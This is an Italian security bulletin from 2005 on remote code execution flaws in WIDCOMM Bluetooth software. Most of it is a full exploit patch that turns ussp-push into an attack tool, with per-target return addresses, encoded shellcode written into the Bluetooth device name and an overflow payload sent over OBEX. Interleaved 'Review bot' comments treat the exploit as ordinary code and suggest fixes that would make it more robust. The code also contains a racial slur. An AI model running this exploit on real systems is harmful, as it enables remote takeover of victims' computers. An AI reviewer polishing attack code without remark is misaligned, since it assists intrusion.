Vulnerabilità WIDCOMM Bluetooth Communications Software
Lunedì, 05 Dicembre 2005 - 17:21 - 10392 Letture
Bug
Alcune vulnerabilità sono state riscontrate nel software per comunicazioni Bluetooth WIDCOMM ...

Un remote user potrebbe eseguire codice arbitrario sul sistema target.
È stato riscontrato che un remote user, mandando particolari richieste via Bluetooth, potrebbe eseguire codice arbitrario sul sistema.
Soluzione: eseguire l'upgrade alla versione 3.0.
È disponibile inoltre un exploit per la vulnerabilità remota:

--- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500


@@ -1,4 +1,10 @@
/*
+ http://www.digitalmunition.com
+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest.
+ http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
* UNrooted.net example code
*
* Most of these functions are just rips from the Affix Bluetooth project OBEX


@@ -62,7 +68,10 @@

#include "obex_socket.h"

-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
#define BT_SERVICE "OBEX"
#define OBEX_PUSH 5



@@ -316,6 +325,9 @@
switch (event) {
case OBEX_EV_PROGRESS:
printf("Made some progress...\n");
+ sleep(3);
+ printf("Peace nigga...\n");
+ exit(0);
break;

case OBEX_EV_ABORT:
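Review bot: `exit(0)` inside the `OBEX_EV_PROGRESS` case terminates the process from within the event callback, so the `break` that follows it is unreachable and nothing the caller would normally do after the callback (closing the OBEX handle, the socket or any open files) runs. If the intent is to stop after the first progress event, set a flag that the caller checks and `break` out of the switch instead of calling `exit`. The message printed just before the `exit` contains a slur and should be replaced with a neutral status line such as `printf("done\n");`. The enclosing switch and function start and end outside the hunk.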


@@ -382,9 +394,7 @@
name = remote;

name_len = (strlen(name)+1)<<1;
- if( (namebuf = g_malloc(name_len)) ) {
- OBEX_CharToUnicode(namebuf, name, name_len);
- }
+ namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode.

buf = easy_readfile(path, &file_size);
if(buf == NULL) {
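Review bot: `name_len` is still computed as `(strlen(name)+1)<<1` on the line above, but `namebuf` now aliases `name` itself, which holds only `strlen(name)+1` bytes; wherever `name_len` is later passed together with `namebuf`, reads run past the end of that string. Either recompute `name_len = strlen(name) + 1;` after the assignment or document why the two-byte-per-character length is kept. The rest of the function, including the use of `name_len`, is outside the hunk.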


@@ -424,6 +434,24 @@
return err;
}

+static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual...
+{
+ int s = hci_open_dev(hdev);
+
+ if (s < 0) {
+ fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ if (opt) {
+ if (hci_write_local_name(s, opt, 2000) < 0) {
+ fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+ hdev, strerror(errno), errno);
+ exit(1);
+ }
+ }
+
+}

/*
* That's all there is to it. With it all setup like this all I have to do
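Review bot: `set_device_name` never closes the descriptor returned by `hci_open_dev`, so every call leaks a raw HCI socket; add `hci_close_dev(s);` before the closing brace and on the error path before `exit(1)`. The `ctl` parameter is unused and `opt` is never written through, so the signature could be `static void set_device_name(int hdev, const char *opt)`, with the `2000` passed to `hci_write_local_name` given a name or a comment (presumably the timeout in milliseconds — confirm against the BlueZ header). A one-line header comment stating that the function writes `opt` as the local adapter name and exits the process on failure would also help, since exiting from a helper is unusual.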


@@ -434,19 +462,87 @@

int main( int argc, char **argv )
{
- if ( argc != 4 ) {
- printf("%s\n\n"
- "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
- "\tDEVICE = RFCOMM TTY device file\n"
- "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
- "\tLFILE = Local file path\n"
- "\tRFILE = Remote file name\n\n",
- UPUSH_APPNAME, argv[0]);
+/*
+ The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+ # Authentication and Encryption (Security Mode 3)
+ auth disable;
+ encrypt disable;
+*/
+
+ struct
+ {
+ char *os;
+ u_long ret;
+ }
+ targets[] =
+ {
+ { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+ { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+ { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+ { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+ { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+ { "[ Crash ]", 0x41424344 },
+ }, v;
+
+ if ( argc != 3 ) {
+ printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]);
+ printf("Types:\n");
+ int i;
+ for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+ printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
return( -1 );
}

- printf( "pushing file %s\n", argv[2] );
- if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+ /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+ /* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+ /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */
+ /* this still crashes the BTStackServer.exe... but oh well */
+ unsigned char scode[] =
+ "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+ "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+ "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+ "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+ "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+ "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+ "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+ "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+ "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+ "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+ "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+ "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+ "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+ "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+
+ set_device_name(0,0,scode);
+ //printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+ //printf( "pushing file.\n");
+
+ char buf[3000];
+ memset(buf,'\0',sizeof(buf));
+ memset(buf,'Z',3); // Sometimes u need 3 z's
+
+ int type = atoi(argv[2]);
+ if(type)
+ {
+ printf("[-] Selected target:\n");
+ printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);
+ }
+
+ int x;
+ for(x=0; x<=122; x=x+1)
+ {
+ memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+ }
+ // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+ if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+ printf( "error\n" );
+ return( -1 );
+ }
+ printf("\nsleeping 3 seconds before triggering the shellcode\n");
+ sleep(3);
+ if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
printf( "error\n" );
return( -1 );
}
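Review bot: `type = atoi(argv[2])` is used directly as an index into `targets` without a range check, so a negative or too-large argument reads past the array (the `if(type)` guard only skips the printout when it is 0). Validate it before any use, e.g. `if (type < 0 || (size_t)type >= sizeof targets / sizeof targets[0]) { return -1; }`, ideally parsing with `strtol` so non-numeric input is rejected rather than silently mapped to 0. The loop index `i` in the usage branch is an `int` compared against a `size_t` quotient, which `-Wsign-compare` flags; declare it `size_t`. The usage string still lists `LFILE RFILE` as positional arguments while the code now checks `argc != 3` and reads a TARGET number, so the text should be updated to match. `main` continues past the end of the hunk.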
 
